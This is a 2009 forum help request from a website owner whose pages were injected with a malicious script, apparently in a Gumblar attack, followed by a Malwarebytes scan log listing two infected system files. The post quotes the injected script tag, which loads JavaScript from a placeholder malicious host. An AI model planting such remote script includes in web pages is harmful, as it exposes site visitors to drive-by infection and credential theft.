Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help, Malware Bytes Closes - Javascript injected into my website


  • Please log in to reply
No replies to this topic

#1 infoworld

infoworld

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:01:23 PM

Posted 16 November 2009 - 07:58 PM

Sadly, I think I am infected -- even though I'm running NOD32 Antivirus. On Saturday, I visited my 3-year old website and I was greeted by a big warning message (courtesy of Google). The message warned me that my site was dangerous ("This site may harm your computer.") After contacting my webhost, it seems something has injected a malicious script inside the HTML/PHP pages on my website. The injected code looked like this:

script src=http://maliciousdomain.com/libraries/CREDITS.php> **end script tag**
Basically, someone was trying to inject Javascript links into my pages.

My webhost believes this is a "Gumblar" attack. http://blog.unmaskparasites.com/2009/10/23...umblar-zombies/ Usually this virus spreads when you visit a site that is already infected - The Javascript on that site automatically installs some malicious virus/backdoor onto your machine to steal your FTP details and then with these details, the code is injected onto your site. All unauthorized/rogue code has been removed from my website, and I want to clean-up my laptop before creating new FTP login details, updating Wordpress passwords, db user passwords, etc. I downloaded Malwarebytes and ran a scan. Here is the output of the scan:

Scan type: Full Scan (C:\|)
Objects scanned: 152988
Time elapsed: 20 minute(s), 15 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 2

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\dllcache\user32.dll (Virus.Mariofev) -> No action taken.
C:\WINDOWS\system32\~.exe (Backdoor.Bot) -> No action taken.

It seems there are 2 infected files -- both inside my system32 directory. After the report printed, Malwarebytes closed. Each time I attempt to open Malwarebytes (to delete the viruses), it closes automatically. Malwarebytes doesn't stay open. How do I remove the 2 infected files above?

Edited by infoworld, 16 November 2009 - 08:00 PM.


BC AdBot (Login to Remove)

 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users